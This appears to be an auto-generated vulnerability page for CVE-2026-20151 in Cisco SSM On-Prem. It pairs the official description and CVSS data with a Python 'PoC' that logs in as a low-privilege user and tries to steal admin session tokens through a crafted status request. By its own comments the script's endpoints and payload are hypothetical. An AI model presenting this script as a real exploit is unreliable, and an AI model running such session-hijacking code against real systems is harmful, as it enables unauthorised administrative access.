Security Vulnerability Report
CVE-2026-20151 CVSS 7.3 HIGH

Published: 2026-04-01 17:28:31
Last Modified: 2026-04-03 16:11:11

Description

A vulnerability in the web interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges on an affected system.

This vulnerability is due to the improper transmission of sensitive user information. An attacker could exploit this vulnerability by sending a crafted message to an affected Cisco SSM On-Prem host and retrieving session credentials from subsequent status messages. A successful exploit could allow the attacker to elevate privileges on the affected system from low to administrative.

To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of System User.

Note: This vulnerability exposes information only about users who logged in to the Cisco SSM On-Prem host using the web interface and who are currently logged in. SSH sessions are not affected.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Smart Software Manager On-Prem (for the specific affected versions, refer to the official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# Target configuration (Replace with actual target details)
TARGET_URL = "https://<target-ssm-host>"
LOGIN_USER = "low_priv_user"
LOGIN_PASS = "password"

def exploit_cve_2026_20151():
    session = requests.Session()
    session.verify = False  # Ignore SSL verification for testing

    print(f"[*] Attempting to login as {LOGIN_USER}...")

    # Step 1: Authenticate as a low-privileged user
    login_data = {
        "username": LOGIN_USER,
        "password": LOGIN_PASS
    }
    try:
        login_resp = session.post(f"{TARGET_URL}/api/login", data=login_data)
        if login_resp.status_code != 200:
            print("[-] Login failed.")
            return
        print("[+] Login successful.")
    except Exception as e:
        print(f"[-] Error during login: {e}")
        return

    # Step 2: Send crafted message to trigger sensitive info leak
    # Based on the vulnerability description, we send a crafted message to retrieve session creds
    print("[*] Sending crafted message to retrieve session credentials...")

    # Hypothetical payload structure based on "improper transmission of sensitive user information"
    crafted_payload = {
        "action": "get_session_status",
        "verbose": True,
        "target_id": "active_admin_sessions"
    }
    try:
        # Hypothetical endpoint that handles status messages
        exploit_resp = session.post(f"{TARGET_URL}/api/v1/status/message", json=crafted_payload)
        if exploit_resp.status_code == 200:
            response_data = exploit_resp.json()
            print("[+] Received response from server.")

            # Step 3: Parse the response for leaked admin credentials
            # The vulnerability states that session credentials are retrievable from status messages
            if "leaked_session_token" in response_data:
                admin_token = response_data["leaked_session_token"]
                print(f"[!] Successfully leaked Admin Token: {admin_token}")

                # Step 4: Verify privilege escalation
                print("[*] Attempting to access admin resources with leaked token...")
                session.cookies.set("session_id", admin_token)
                admin_check = session.get(f"{TARGET_URL}/api/admin/config")
                if admin_check.status_code == 200:
                    print("[!] Privilege Escalation Successful! Admin access confirmed.")
                else:
                    print("[-] Token did not grant admin access.")
            else:
                print("[-] Response did not contain expected leaked credentials. Vulnerability might not be triggered or patched.")
                print(f"Debug Response: {json.dumps(response_data, indent=2)}")
        else:
            print(f"[-] Exploit request failed with status code: {exploit_resp.status_code}")
    except Exception as e:
        print(f"[-] Error during exploitation: {e}")

if __name__ == "__main__":
    exploit_cve_2026_20151()
```

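References

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-priv-esc-xRAnOuO8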

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20151", "sourceIdentifier": "[email protected]", "published": "2026-04-01T17:28:31.097", "lastModified": "2026-04-03T16:11:11.357", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges on an affected system.\r\n\r\nThis vulnerability is due to the improper transmission of sensitive user information. An attacker could exploit this vulnerability by sending a crafted message to an affected Cisco SSM On-Prem host and retrieving session credentials from subsequent status messages. A successful exploit could allow the attacker to elevate privileges on the affected system from low to administrative.\r\nTo exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of System User.\r\nNote: This vulnerability exposes information only about users who logged in to the Cisco SSM On-Prem host using the web interface and who are currently logged in. SSH sessions are not affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-priv-esc-xRAnOuO8", "source": "[email protected]"}]}}